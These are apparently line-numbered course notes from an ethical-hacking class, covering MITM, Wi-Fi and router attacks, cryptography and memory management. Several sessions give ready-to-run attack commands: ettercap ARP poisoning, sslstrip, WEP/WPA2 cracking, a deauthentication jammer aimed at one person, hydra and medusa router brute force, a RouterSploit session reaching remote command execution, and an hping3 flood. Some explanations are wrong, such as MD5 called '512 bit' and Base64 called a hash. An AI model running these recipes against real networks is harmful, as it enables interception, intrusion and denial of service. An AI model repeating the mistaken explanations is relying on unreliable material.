2848------------------------------------------------------------------------------------------
2849
2850OWASP ZAP - LINUX TOOL
2851======================
2852The OWASP ZAP (ZAP) tool is one of the most popular free penetration testing tool. It can help you automatically find security vulnerabilities in your web applications while for experienced pentesters to use for manual security testing. The main goal is to allow easy penetration testing to find vulnerabilities in web applications.
2853
2854ZAP tool in Kali Linux.
2855
2856Steps
2857=====
28581. Adding the Target site to the testing scope.
28592. Setting up Proxy for ZAP. - ZAP tool > Tools Menu > Options > Local Proxy > Change Address = 127.0.0.1 Port = 8080.
2860Setting up the Proxy in the Browser : Mozilla browser > Tools Menu > Options > Advanced tab > Network > Settings > Select Manual Proxy configuration:- HTTP Proxy = 127.0.0.1 Port = 8080.
28613. Attacking on the Websites through ZAP.
28624. Saving the ZAP Session.
28635. Generating Report = ZAP tool > Report > Generate HTML report > Save and share the report.
2864
2865
2866-----------------------------------------------------------------------------------------
2867
2868
2869
2870 SESSION 18
2871 ==========
2872
2873INTRODUCTION TO NETWORK SECURITY
2874================================
2875
2876Nowadays we get Free Wi-Fi and Networks at Social Gathering Places. For eg. McDonalds, Indian Railways, Airport etc.
2877
2878We get free WiFis but the data is insecure over there. Any malicious person sitting in the network can monitor and watch each and every data which is being sent in the network.
2879These type of attacks cannot be detected by anyone.
2880
2881Disadvantages of Free WIFI
2882==========================
2883= Cyber Terrorism Activities can be done using some Free WIFI.
2884= DDOS can be done through all the Clients connected through the Free WIFI.
2885= Unauthorized users like hackers can easily intercept your data by MITM.
2886= Attackers can spread Viruses, worms, and Trojan horses in the whole network.
2887= Data interception and theft and Identity theft etc.
2888
2889
2890MITM
2891=====
2892MITM stands for Man In The Middle Attack, in which an Intruder is sitting inside the network, and can watch and alter the data. And hence, can gather the credential information of the other users sitting inside the network.
2893For performing the attack we need to know the IP Address of the target. For getting the IP Address of the target, we use some tools for reconaissance.
2894
2895Tools
2896======
2897
2898Tool for MITM :
2899
2900= Ettercap : Linux based tool, which is used to perform multiple MITM attacks like ARP Poisoning, DNS Poisoning etc.
2901
2902ARP POISONING ATTACK - ARP Poisoning is a type of cyber attack carried out over a LAN that involves sending malicious ARP packets to a default gateway on a LAN to spoof the IP to MAC address table. ARP Protocol translates IP addresses into MAC addresses.
2903
2904STEPS
2905=====
2906
2907ARP POISONING
2908==============
2909= ettercap -G (-G for Graphical version)
2910= Click on "sniff" further "Uniffied sniffing"
2911= Select the interface
2912= Go to Hosts and "Scan for hosts" for scanning all the hosts of the Network.
2913= Hosts > "Host List"
2914= Check for the Default Gateway(Router's IP) by "route -n"
2915= Select the Gateway as "Add to Target 1"
2916= Select the Target Machine as "Add to Target 2"
2917= Further proceed to MITM and click on "ARP Poisioning"
2918= Click on "Sniff Remote Connection"
2919= Go to MITM and click on "ARP Poisoning" (Address Resolution Protocol)
2920= Click on "Start Sniffing"
2921
2922But the limitation was it was only performing on HTTP Websites.
2923
2924For performing MITM on HTTPS with SSL Stripping
2925===============================================
2926
2927SSLStrip is a type of MITM attack that forces a victim's browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server.
2928In short we convert the HTTPS website into HTTP, which means we can even watch the passwords of HTTPS websites.
2929
2930Steps
2931=====
2932terminal > echo "1" > /proc/sys/net/ipv4/ip_forward
2933terminal > nano /etc/ettercap/etter.conf
2934 = Find iptables in the conf file > copy and apply as given in the next step.
2935terminal > iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
2936terminal > sslstrip -l 8080
2937
2938DNS Poisioning or DNS spoofing, is a form of computer security hacking iwhich is behaving like a Man in the Middle, which corrupt Domain Name System data is spoofed by Attacker and further intercepts the data.
2939
2940
2941
2942For Getting the Images :
2943> TERMINAL : driftnet
2944
2945For Getting the URL :
2946> TERMINAL : urlsnarf
2947
2948------------------------------------------------------------------------------------------
2949
2950Another Tool for MITM - Bettercap and Xerosploit
2951=================================================
2952
2953Bettercap V1. - git clone https://github.com/evilsocket/bettercap
2954Xerosploit - git clone https://github.com/LionSec/xerosploit
2955
2956------------------------------------------------------------------------------------------
2957
2958---------------------------------------------------------------------
2959
2960Xerosploit - Use replace for changing the images.
2961
2962
2963
2964 SESSION 19
2965 ===========
2966
2967Wireless Networks are the networks which don't need to connect to any Network Peripheral. For eg. Bluetooths, WIFI etc. These Wireless Network came into existence because when we were using physical networks, it was very difficult to maintain and to spend expenses on various physical mediums required for establishing connection with end users used in Physical Network. Physical Medium includes Switches, Hubs, Cables, Connections, and Maintenances etc.
2968
2969WIFI ALLIANCE - Organization
2970
2971For using these Wireless Networks, there is an standard which sets Rules and Regulations to use Wireless Networks for using Internet named as "IEEE 802.11" .
2972
2973 They derive a term known as WIFI, which means Wireless Fidelity.
2974
2975The IEEE 802.11 execute the action of WIFI VIA a router having DHCP inbuilt in it. First company to come with this technology of wireless router was DLINK.
2976
2977Need Of Wireless Security
2978=========================
2979Nowadays every Smart Device is using Wireless Networking. If a Wireless Network is not secured it will leads to manipulation and illegal use of all those Devices connected to that Network.
2980Unauthorized users like hackers can easily intercept your data by MITM.
2981Attacker can spread Viruses, worms, and Trojan horses in the whole network.
2982Data interception and theft and Identity theft etc.
2983
2984--------------------------
2985
2986Due to such security breaches, there is a vast need of Wireless Security. These Wireless Securities were as follows :
2987
2988WEP (Wired Equivalent Privacy) came in year 1997
2989WPA (WiFi Protected Access) came in year 2003
2990WPA 2 WIFI Protected Access with AES/CCMP came in year 2004
2991
2992WEP (Wired Equivalent Privacy)
2993==============================
2994WEP was designed to give wireless networks the equivalent level of privacy protection as a comparable wired network, but technical flaws greatly limits the use of it. Consumers who purchased 802.11b/g routers in the early 2000s had no practical Wi-Fi security options available other than WEP. WEP uses RC4 ALGORITHM and DES Encryption, which is easy to break. The problem with WEP is that the key is static, which is vulnerable, means by using some tools a hacker could use reverse-engineering to extract the encryption key. This process affects the transmission speed.
2995
2996WPA (WiFi Protected Access)
2997============================
2998It was developed in response to the weaknesses of WEP, and therefore improves on WEP's authentication and encryption features. WPA make it more secure by adding extra security mechanism and algorithms to stop unauthorized access. WPA delivers a level of security way beyond anything that WEP can offer. WPA need support of RADIUS (Remote Authentication Dial-in User Service)Servers which helps in Authentication of the users.
2999
3000WPA 2 (WIFI Protected Access with AES/CCMP)
3001============================================
3002WPA2 was same as WPA, the only difference is for providing stronger encryption than WEP through use of either of two standard technologies: Temporal Key Integrity Protocol (TKIP) and Advanced Encryption Standard (AES) with Pre-Shared Keys(PSK).
3003
3004
3005ENCRYPTIONS
3006=============
3007
3008AES : The Advanced Encryption Standard, or AES, is a symmetric block cipher chosen by the U.S. government to protect classified information, passphrases and other things using symmetric key algorithm.
3009
3010DES : The Data Encryption Standard (DES) is an outdated symmetric-key method of data encryption. DES works by using the same key to encrypt and decrypt a message, so both the sender and the receiver must know and use the same private key.
3011
3012TKIP : Temporal Key Integrity Protocol is an encryption protocol included as part of the IEEE 802.11 standard for wireless LANs (WLANs).
3013
3014PSK : PSK is used in Wi-Fi encryption such as Wired Equivalent Privacy (WEP), Wi-Fi Protected Access (WPA), where the method is called WPA-PSK or WPA2-PSK which was previously shared between the two parties using some secure channel before it needs to be used.
3015
3016CCMP : Counter Mode Cipher Block Chaining Message Authentication Code Protocol is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality which was created to address the vulnerabilities presented by WEP, a dated, insecure protocol.
3017
3018
3019
3020SECURITY CONFIGURATIONS
3021=========================
3022
3023Keeping password security strong and possibly unbreakable
3024
3025
3026chillypannerr@234 c#i77YP4n333@234
3027
3028 Use minimum 8 characters as the password
3029 Use alphabet in both cases > pASSwOrD
3030 Use number in the password > p3$$w0rd
3031 Use special character. Eg. - a-@ , e-3, h-# etc.
3032
3033
3034Website - https://howsecureismypassword.net/
3035
3036
3037
3038WIFI HANDSHAKE
3039===============
3040The four-way handshake is designed so that the access point (or authenticator) and wireless client (or supplicant) can independently prove to each other that they are the authenticated and correct.
3041
3042= The Access Point sends the Nonce(used only once) Packet to the Client.
3043= The Client uses the Nonce Packet for the Authentication process.
3044= The AP responds with Broadcasting, Multicasting Messages of Authentication.
3045= The Client accepts the broadcasting packet and responds with Acknowledgement Packet (ACK) which helps in further connecting to the AP.
3046
3047
3048
3049CAPTURING WIRELESS COMMUNICATION PACKETS
3050==========================================
3051
3052Attacker’s Machine - Kali OS
3053Device Used - Leoxsys External WIFI Adapter - 150HGN : https://www.amazon.in/Leoxsys-150Mbps-Wireless-external-LEO-HG150N/dp/B00IWT1JA6/ref=sr_1_1?ie=UTF8&qid=1529569817&sr=8-1&keywords=leoxsys
3054Tool - Airmon-ng , Airodump-ng (Non-Graphical)
3055
3056
3057Modes of Using a Wireless Adapter :
3058
3059= Standard Mode | Managed Mode : Which every Layman use to access and use the services of a particular Access Point.
3060
3061= Monitoring Mode : The mode which allows a computer with a wireless network interface controller to monitor all traffic received from the wireless network.
3062
3063TERMINOLOGIES
3064===============
3065Beacons : Number of beacons sent by the AP. Each access point sends about ten beacons per second at the lowest rate (1M), so they can usually be picked up from very far.
3066#Data : Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
3067#s : Number of data packets per second measure over the last 10 seconds.
3068CH : Channel number (taken from beacon packets). Note: sometimes packets from other channels are captured even if airodump-ng is not hopping, because of radio interference.
3069MB : Maximum speed supported by the AP. The dot (after 54 above) indicates short preamble is supported. 'e' indicates that the network has QoS (802.11e) enabled.
3070ENC : Encryption algorithm in use. OPN = no encryption,"WEP?" = WEP or higher (not enough data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
3071CIPHER The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
3072AUTH The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2).
3073 WPS This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the first field of the column indicates version supported.
3074ESSID : The name of the AP.
3075BSSID : MAC Address of the Access Point.
3076
3077DEMONSTRATION
3078===============
3079
3080Opening up Kali Machine and using tools.
3081
3082
3083REQUIREMENTS FOR CRACKING WIRELESS NETWORKS
3084============================================
3085
3086OS : Kali Linux
3087Hardware Components : Wireless Adapter that supports Monitor Mode (Using "Leoxsys 150 HGN")
3088Tools : (CLI Tools Pre-Installed in Kali Linux)
3089- Airmon-ng : For Enabling Monitor Mode.
3090- Airodump-ng : For Dumping Wireless Fidelity Packets.
3091- Aireplay-ng : For generating frames/packets and altering with Network Packets.
3092- Aircrack-ng : For Doing Brute Force Attack on the WIFI Captured Packets through the help of a Wordlists.
3093
3094
3095Aireplay-ng
3096============
3097Aireplay-ng is used to inject/replay frames. The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications etc.
3098
3099
3100Aircrack-ng
3101===========
3102Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program. It can recover the WEP key once enough encrypted packets have been captured with airodump-ng. This uses methods incorporates various statistical attacks to discover the WEP key and uses these in combination with brute forcing. Additionally, the program offers a dictionary method for determining the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist (file having credentials) has to be used.
3103
3104
3105Workflow for Cracking WEP, WPA/WPA2:
3106====================================
3107
3108Step 1: To start the monitor mode.
3109Step 2: To start gathering information about the wireless signals.
3110Step 3: To start capturing the packets.
3111Step 4: Cracking the WiFi password.
3112
3113
3114--------------------------------------------------------------------------------------------------
3115
3116
3117CRACKING WEP ENCRYPTION
3118========================
3119
3120Steps :
3121
3122# iwconfig // Wireless Adapter Name wlan0
3123
3124# airmon-ng start wlan0 // Starting Monitoring Mode on Adapter
3125
3126# kill PID // Killing processes
3127
3128# iwconfig // After Monotoring mode adapter name is : wlan0mon
3129
3130# airodump-ng wlan0mon // Starting Dumping on Wireless Adapter
3131
3132# airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wepp wlan0mon // saving dumping packets to a file.
3133 --bssid : router's mac address
3134 -c : channel number
3135 -w : writing/capturing wireless packets
3136(This will automatically adds -01,-02 in addition to the file name. Here it'll be wepp-01.cap .)
3137
3138# aireplay-ng -1 0 -a <bssid of my wep router> wlan0mon // Sending Re-authentication packets to the router
3139
3140NOTE : There must be atleast 15,000 Beacon Packets Captured.
3141
3142# aircrack-ng wepp-01.cap // Cracking Stored WEP Packets
3143
3144
3145The key will be found with (:) in between. For eg. If the passphrase of the access point is "1234567890" , the Cracked Key will be shown as "12:34:56:78:90" .
3146Remove the (:) sign from the KEY Founded, and the password will be in front of you.
3147
3148
3149--------------------------------------------------------------------------------------------------
3150
3151
3152CRACKING WPA/WPA2
3153==================
3154
3155Steps :
3156
3157# iwconfig // Wireless Adapter Name wlan0
3158
3159# airmon-ng start wlan0 // Starting Monitoring Mode on Adapter
3160
3161# kill PID // Killing processes
3162
3163# iwconfig // After Monotoring mode adapter name is : wlan0mon
3164
3165# airodump-ng wlan0mon // Starting Dumping on Wireless Adapter
3166
3167# airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wpa2 wlan0mon // saving dumping packets to a file.
3168 --bssid : router's mac address
3169 -c : channel number
3170 -w : to write/capture packets
3171(This will automatically adds -01,-02 in addition to the file name. Here it'll be wpa2-01.cap .)
3172
3173# aireplay-ng -0 10 -a <bssid of router> -c <bssid of client/user> wlan0mon // Sending deauthentication packets to the client/user of a router.
3174 -0 : deauthentication packet
3175 -a : mac of target router
3176 -c : mac of any connected client/user
3177(Now we are sending 10 Deauthentication Packets to the client, after that if the client again tries to reconnect, the WIFI Handshake will be captured of that access point.)
3178
3179# aircrack-ng -w <path of dictionary> <filename*.cap> //Starting Dictionary Attack through a Wordlists
3180Wordlists we are using is Rockyou.txt which is pre-installed in kali linux. Path of rockyou.txt is : /usr/share/wordlist/rockyou.txt/ .
3181
3182This will be showing you the password as (KEY FOUND : Password of the Access Point).
3183
3184
3185--------------------------------------------------------------------------------------------------
3186
3187CREATING WIFI JAMMER FOR A SPECIFIC PERSON
3188==========================================
3189
3190# airodump-ng -c <chanel number> -w file --bssid <bssid of router> wlan0mon
3191
3192# aireplay-ng --deauth 0 -c <bssid of a specific device> -a <bssid of the router> wlan0mon
3193
3194--------------------------------------------------------------------------------------------------
3195
3196Other Automated Tool For Wireless Cracking :
3197
3198FLUXION - https://github.com/FluxionNetwork/fluxion
3199Only for Linux OS.
3200
3201
3202--------------------------------------------------------------------------------------------------
3203
3204
3205
3206 SESSION 20
3207 ==========
3208
3209MOBILE HACKING & SECURITY
3210=========================
3211
3212https://drive.google.com/open?id=11NwL8hUoNFgyoock3fDytMzwYptqMQ_8
3213
3214
3215
3216 =======
3217 GRADE 2
3218 =======
3219
3220
3221
3222 SESSION 1
3223 =========
3224
3225INTRODUCTION TO CRYPTOGRAPHY
3226============================
3227
3228Cryptography is a form of Encryption itself, where a readable plain text format is converted into another form which doesn’t leave the value of the plain text as it was before but the basic difference will be, the converted form will be readable by the human beings but will be of no sense. These encryption technique is used mostly for securing and maintaining the privacy of the data.
3229
3230For this technique user had to have a Encryption Algorithm and a Key for its Decryption. User will transmit that encrypted message, Receiver will receive. Now for the receiver to understand, he needs to convert it into plain text, cipher, for that he again needs the key and the exact algorithm (decryption).
3231
3232TERMINOLOGIES
3233
3234Plain Text : A text which is created and readable by the individuals only.
3235Cipher Text : It is the encrypted text, which is converted by applying an algorithm on the plain text.
3236Encryption : Process of converting a plain text to cipher text.
3237Decryption : Process of converting a cipher text to plain text.
3238
3239CIPHERS
3240========
3241In Cryptography process, Ciphers are those encrypted text which came through the algorithm process of encryption.
3242
3243Example of Cipher :
3244
3245Caesar Cipher is one of the oldest ciphers which came across with the technique of encrypting a plain text into a Cipher Text. Caesar Cipher works by adding or subtracting 3 characters of that particular number. That means if in a Plain Text there is a Character E either it will be transferred it to B and if the character is A it will be transferred to X.
3246
3247This Cipher algorithm is having some mathematical equations which describe the functionality of a cryptography process.
3248
3249 Further examples of these Ciphers are Hill Climb and Play Fair Cipher.
3250
3251When we talk about the algorithm of these Encryption Algorithms, these are type of standards or modulation on which the Encryption is going on. Like AES (Advanced Encryption Standard), DES (Data Encryption Standards), RSA (Rivest Shamir Adleman) etc.
3252
3253
3254KEY SYSTEM IN CRYPTOGRAPHY
3255=============================
3256A cryptographic key is that bits used of data which are use by cryptographic algorithms for converting plain text into cipher text or vice versa.
3257There are mainly two Cryptographic Keys.
3258
3259ASYMMETRIC KEY / PUBLIC KEY CRYPTOGRAPHY : Asymmetric key encryption algorithms called public key algorithms use two different keys but related keys for encryption and decryption and is publicly provided by the Web Server.
3260
3261SYMMETRIC KEY / PRIVATE KEY CRYPTOGRAPHY : Symmetric key encryption algorithms use a single symmetric key for both encryption and decryption and is a privately kept.
3262
3263STEGANOGRAPHY
3264================
3265Steganography is a process in which we basically hide a data inside a data. This is the process in which the data is hidden into the Plain Sight or a Image, Audio or a Video file. This process can also be used along with cryptography as an extra-secure method in which to protect data.
3266One of the most famous and simplest technique used in Steganography is least significant bit technique also known as LSB.
3267
3268STEPS :
3269$ CMD > copy /b Jelly.jpg+list.txt steganography.jpg
3270
3271Here, /b is used for Binding the 2 files, Copy is used for copying the content of second file to first file.
3272
3273For using Cryptography with Steganography, we can use “Encipher.it”.
3274
3275Eg :
3276
3277copy /b gokuu.jpg+hashes.txt sanjeev.jpg
3278
3279
3280Hashes
3281======
3282It converts data into either alpha numeric form or in hex form. But there is a difference between a cipher encryption and a hash. The difference is encrypted text can be reverted and further decrypted, but hashes cannot be reverted. We need to crack the hashes.
3283Hash function is that which takes an input and returns a fixed-size alphanumeric string. The string is called the hash value. Examples MD5 Hash, Base64 Encoding etc.
3284
3285
3286EG. alphanumeric - scusege67dg367df7fd3fd37f3636d
3287
3288Cracking methods for Hashes : We have to create a dictionary and have to convert every word into the hash of a particular wordlists, and after that we will compare that particular hash. If matches it means that the specific word is found. Hashes are usually uniques.
3289
3290HASHES FORMATS
3291================
32921. Base64 encoding
3293It is the process of encoding, in which the plain text is converted into the alpha numeric form, but the length of the hash varies as per the length of the plain text. It's a textual encoding of binary data where the resultant text has nothing but letters, numbers and the symbols.
3294
3295
32962. MD5 (Message Digest 512 bit)
3297It will convert the plain text into hexadecimal text of fixed length. It always creates a unique hash for the plain text and are normally shown in their 32 digit hexadecimal value equivalent.
3298
3299
3300AUTOMATED TOOL
3301================
3302
3303Hashcat is the world’s fastest and most advanced password recovery tool. It is the fastest hash recovery tool which converts the wordlist into the hashes and then matches those hashes with the specific hash we want to recover. It is pre-installed in kali linux OS.
3304Instead of using standard CPU cores, it will use GPU or Graphic card cores.
3305
3306USAGE :
3307$ hashcat -m 0 -a 3 <hashfile in txt> <dictionary|wordlist>
3308
3309STEPS :
3310$ hashcat -m 0 -a 3 /root/Desktop/hash.txt /usr/share/wordlists/rockyou.txt
3311$ hashcat -m 0 -a 3 /root/Desktop/hash.txt /usr/share/wordlists/rockyou.txt --force
3312
3313Here,
3314hashcat is the tool for password recovery
3315- m : hash type
33160 : MD5
3317-a : attack mode
33183 : Brute force attack
3319hash.txt : file containing hashes to be recovered
3320rockyou.txt : for brute forcing and comparing
3321--force : to start forcefully
3322
3323CUDA CRACKING
3324===============
3325CUDA Cracking also called GPU Password Cracking is only for NVidia. Cuda is the part of NVidia only, so Graphic cards which are of NVidia can support cuda cracking, which makes the password recovery very fast.
3326
3327
3328-------------------------------------------------------------------------------
3329
3330WEP
3331===
3332
3333WEP stands for Wired Equivalent Privacy, a Wi-Fi wireless network security standard. A WEP key is a kind of security passcode for Wi-Fi devices. WEP keys enable a group of devices on a local network to exchange encrypted (mathematically encoded) messages with each other while hiding the contents of the messages from easy viewing by outsiders.
3334
3335
3336- Pixie Dust Attack
3337- Using Wifite
3338
3339
3340https://pastebin.com/nRBTeEMee
3341
3342
3343
3344 SESSION 2
3345 =========
3346
3347ROUTER PENETRATION TESTING
3348==========================
3349
3350Router is the central connecting device, which provides the connectivity to all the end devices and nodes along with the network components of a particular network. Router Pentesting is a process in which a network auditor has seen cross check all the possible information gathering as well as exploitation methods as per the router. The goal of router pentesting is to know scope of network by identifying the total number of access points, MAC address of each router, model number of router, company name of router, firmware version.
3351
3352There are two types of attacking procedures for that :
3353
3354Active Router Attack : In this attack we try to attack directly on the Router’s IP which is 192.168.0.1 or 192.168.1.1 mostly and try to halt the services in the network and getting the juicy data out of the Router.
3355Eg. Dictionary Attack
3356 Wifi Jammer
3357 Brute Force
3358 DOS AND DDOS
3359
3360Passive Router Attack: In this attack we do not engage the router in the process moreover we play with the broadcasted packets data generated by the router. The attack doesn’t goes directly to the Router but the attacker can use the data which is being originated from the or through the router and moving on.
3361Eg. Sniffing and Monitoring the WIFI Traffic doing MITM and other things etc..
3362
3363Attack Vectors
3364Information Gathering of the Router :
3365When connected to the network
3366Terminal : route -n
3367Terminal : netdiscover -r 192.168.0.1/24
3368(This can be used for getting the MAC address of the router)
3369When we got the MAC address : https://www.macvendorlookup.com/ can be used for getting the Vendor Name.
3370
3371How to find out more about Router Vendor : (When the MAC Address is spoofed)
3372
3373Airmon-ng start wlan0
3374Airodump-ng -M --bssid -c wlan0mon. (Big Window)
3375
3376-----------------------------------------------------------------
3377
3378http://192-168-1-1ip.mobi/default-router-passwords-list/
3379http://www.routerpasswords.com/
3380https://www.bestvpn.com/default-router-login-details/
3381
3382---------------------------------------------------------------------
3383
3384Brute Forcing on Default Credentials :
3385Default credentials are those which are not changed after the purchase of the Router itself, these are the Router Login page Credentials.
3386Mostly the Username goes with Admin only.
3387
3388For Brute Forcing we are gonna using some advanced brute force tools which are pre-installed in Kali Linux.
3389Tools : Hydra, Medusa, Xhydra, Burpsuite
3390
3391Attacking Methods:
3392
3393Hydra : #hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 -m http-get
3394
3395Here, -l : username, -P : Passwords, where we put a dictionary of credentials, Rockyou.txt , http-get / http-post : Way of transmission of data , 192.168.0.1 : Default Router's IP Address.
3396
3397Medusa : #medusa -h 192.168.0.1 -u Admin -P <dictionary file> -M http
3398
3399Here, -h : Target IP Address , -u : Username , -P : Password, here we can embed Dictionary if credentials, -M : Method of transmission
3400
3401
3402Routersploit Framework (RSF)
3403=============================
3404
3405It is a tool written in python used for automating the process of router exploitation. This is not pre-installed in Kali Linux, so we have to get it from external sources.
3406
3407Downloading Steps :
3408Installation on Kali Linux :
3409apt-get install python3-pip
3410git clone https://www.github.com/threat9/routersploit
3411cd routersploit
3412python3 -m pip install -r requirements.txt
3413python3 rsf.py
3414
3415Running Steps :
3416
3417When the Routersploit Framework is on,
3418rsf > help (For help Menu)
3419Global commands:
3420help - Print this help menu
3421use <module> - Select a module for usage
3422exec <shell command> <args> - Execute a command in a shell
3423search <search term> - Search for appropriate module
3424exit - Exit RouterSploit
3425rsf > use scanners/ (Using Scanners : Will show the list of every scanner)
3426scanners/2wire_scan
3427scanners/billion_scan
3428scanners/huawei_scan
3429scanners/netcore_scan
3430scanners/tplink_scan
3431scanners/3com_scan
3432scanners/cameras_scan
3433scanners/ipfire_scan
3434scanners/netgear_scan
3435scanners/ubiquiti_scan
3436scanners/asmax_scan
3437scanners/cisco_scan
3438scanners/juniper_scan
3439scanners/netsys_scan
3440scanners/zte_scan
3441scanners/asus_scan
3442scanners/comtrend_scan
3443scanners/linksys_scan
3444scanners/routers_scan
3445scanners/zyxel_scan
3446scanners/autopwn
3447scanners/dlink_scan
3448scanners/misc_scan
3449scanners/shuttle_scan
3450scanners/belkin_scan
3451scanners/fortinet_scan
3452scanners/movistar_scan
3453scanners/technicolor_scan
3454scanners/bhu_scan
3455scanners/grandstream_scan
3456scanners/multi_scan
3457scanners/thomson_scan
3458rsf > use scanners/autopwn (using autoseatch)
3459rsf (AutoPwn) > show options
3460
3461Target options:
3462
3463 Name Current settings Description
3464 ---- ---------------- -----------
3465 target Target IP address e.g. 192.168.1.1
3466 port 80 Target port
3467
3468
3469Module options:
3470
3471 Name Current settings Description
3472 ---- ---------------- -----------
3473 threads 8 Number of threads
3474
3475
3476rsf (AutoPwn) >
3477
3478rsf (AutoPwn) > set target 192.168.0.1
3479[+] {'target': '192.168.0.1'}
3480rsf (AutoPwn) > show options
3481
3482Target options:
3483
3484 Name Current settings Description
3485 ---- ---------------- -----------
3486 target 192.168.0.1 Target IP address e.g. 192.168.1.1
3487 port 80 Target port
3488
3489
3490Module options:
3491
3492 Name Current settings Description
3493 ---- ---------------- -----------
3494 threads 8 Number of threads
3495
3496
3497rsf (AutoPwn) >
3498
3499
3500[*] Could not verify exploitability:
3501 - exploits/routers/dlink/dsl_2740r_dns_change
3502 - exploits/routers/dlink/dir_815_850l_rce
3503 - exploits/routers/dlink/dsl_2640b_dns_change
3504 - exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
3505 - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
3506 - exploits/routers/shuttle/915wm_dns_change
3507 - exploits/routers/billion/5200w_rce
3508 - exploits/routers/cisco/catalyst_2960_rocem
3509 - exploits/routers/cisco/secure_acs_bypass
3510
3511[+] Device is vulnerable:
3512 - exploits/routers/dlink/multi_hnap_rce
3513
3514rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
3515rsf (D-Link Multi HNAP RCE) > show options
3516
3517Target options:
3518
3519 Name Current settings Description
3520 ---- ---------------- -----------
3521 target Target address e.g. http://192.168.1.1
3522 port 80 Target Port
3523
3524
3525rsf (D-Link Multi HNAP RCE) > set target 192.168.0.1
3526[+] {'target': '192.168.0.1'}
3527rsf (D-Link Multi HNAP RCE) > show options
3528
3529Target options:
3530
3531 Name Current settings Description
3532 ---- ---------------- -----------
3533 target http://192.168.0.1 Target address e.g. http://192.168.1.1
3534 port 80 Target Port
3535
3536
3537rsf (D-Link Multi HNAP RCE) >
3538rsf (D-Link Multi HNAP RCE) > run
3539[*] Running module...
3540[*] Target might be vulnerable - it is hard to verify
3541[*] Invoking command loop...
3542[*] It is blind command injection, response is not available
3543
3544[+] Welcome to cmd. Commands are sent to the target via the execute method.
3545[*] Depending on the vulnerability, command's results might not be available.
3546[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
3547
3548-----------------------------------------------------------------
3549
3550
3551DDOS
3552=====
3553
3554A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. DDoS attacks achieve effectiveness by utilizing multiple compromised computer systems as sources of attack traffic.
3555
3556
3557DDOS Explained : https://www.youtube.com/watch?v=OhA9PAfkJ10
3558
3559DDOS Ping of Death Attack by using Hping3 -
3560
3561hping3 192.168.195.183 -c 100000000000 -d 999999999 --rand-source --flood -p 3306
3562
3563
3564--------------------------------------------------------------------------------------------------
3565
3566
3567
3568 SESSION 3
3569 =========
3570
3571WINDOWS MEMORY MANAGEMENT
3572=========================
3573
3574Memory - Storage : where we can store anything, any kind of data
3575 Data - It can be anything - Text, Document, Pic, Music, Video
3576Management - Allocating memory - Which process will comsume what amount of memory, at what time what sort of memory will be used.
3577
3578
3579There are two types of memory
3580=============================
35811. Primary Memory
35822. Secondary Memory
3583
3584
35851. Primary Memory
3586=================
3587 Also referred as execution memory. In which data wipes out, when ever you start/stop the OS. It is also known as temporary memory. It works for executing things.
3588 Eg. RAM - Random Access Memory
3589
35902. Secondary Memory
3591===================
3592 In which we can permanently store the data, When ever we store data in this type of memory, it will remain there, until the user deletes it manually.
3593 Eg. Hard Disk Drive, USB drive, CD, DVD.
3594
3595
3596Memory Management - How to allocate the memory to the process, how to allocate memory to the application. How to store the data in the hard disk drive.
3597
3598How to optimize your hard disk?
3599Solutions :
3600 temp - What are they? > %temp% > Should we delete these?
3601 Background processes > PIDs
3602 disk cleanup > Defragmentation
3603 prefetch > boot temporary files
3604
3605
3606CD - compact Disk
3607DVD - Digital Versatile Disk
3608
3609Virtualization
3610==============
3611 Sharing the resources of one device for better and more processes.
3612 VMWare, Virtual Machine, Virtual Box
3613
36141. Type 0 - Also known as "Bare Bone" - In the hard disk, you directly install the virtualization software and then you install virtual OS.
3615
3616https://www.vmware.com/in/products/vsphere.html
3617
36182. Type 1 - In the Hard Disk, you install the OS and in that OS, you install the Virtualization software and on that you install virtual OS.
3619
3620Virtual Memory
3621==============
3622 It is the space which is not actual the physical space but a virtual space. when the space in the RAM get low, then It borrows some memory from the HDD, for continuing the processes.
3623
3624Virtual Table
3625=============
3626 They are like my content page, index page in the book. They tell me at which location my process is located and will help the RAM to access the process.
3627
3628Virtual Page
3629============
3630 Contains the collection of virtual table, in which all the processes are mapped.
3631
3632
3633Dymanic Memory Allocation
3634=========================
3635 Malloc()
3636 calloc()
3637 realloc()
3638 free()
3639
3640Malloc - Memory allocation
3641 To allocate the memory in any manner, it is not continuous memory allocation. It used pointer.
3642calloc - Contigious Memory Allocation
3643 It allocated the continuous block of the memory.
3644 It uses the pointer for allocating the memory.
3645
3646realloc - Reallocation of Memory - If, while performing the process, the memory runs out, then I am here to assist you with more memory by again allocating it to the process.
3647
3648Free - Vacant the Memory - to make the memory vacant which is consumed by the background processes.
3649
3650https://www.tutorialspoint.com/cprogramming/c_memory_management.htm
3651
3652---------------------------------------------------------
3653
3654How Data is stored in CD|DVD
3655 CD is divided into tracks and sectors.
3656
3657How Does Cyber Forensic Works
3658=============================
3659 1. They never operate on the original source.
3660 2. I will make atleast 15 copies|clones of the reterived source using the machines which is used to create these hardwares.
3661 3. I will maintain a journal, for each and everything we collected, with location and the time.
3662 4. I will always take the source to the isolated place, for forensics.
3663
3664Data Recovery Application
3665==========================
3666= Recuva - https://recuva.en.softonic.com/download
3667= Active Undelete
3668
3669
